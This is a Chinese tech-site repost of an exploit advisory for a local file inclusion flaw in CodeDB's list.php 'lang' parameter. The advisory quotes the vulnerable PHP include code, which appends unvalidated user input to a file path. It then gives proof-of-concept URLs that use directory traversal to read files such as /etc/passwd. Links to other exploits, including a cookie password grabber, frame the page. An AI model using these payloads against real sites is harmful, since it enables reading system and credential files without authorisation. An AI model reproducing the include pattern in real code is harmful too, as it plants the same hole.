您现在的位置是：网站首页> 编程资料编程资料

CodeDB (list.php lang) Local File Inclusion Vulnerability _Exploit_网络安全_

2023-05-24 391人已围观

简介 CodeDB (list.php lang) Local File Inclusion Vulnerability _Exploit_网络安全_

###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd
http://[host]/[codeDB_path]/list.php?lang=../[local_file]

EoF.

上一篇：Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit _Exploit_网络安全_

下一篇：MFORUM 0.1a Arbitrary Add-Admin Vulnerability _Exploit_网络安全_

您现在的位置是：网站首页> 编程资料编程资料

CodeDB (list.php lang) Local File Inclusion Vulnerability _Exploit_网络安全_

相关内容

点击排行

本栏推荐

猜你喜欢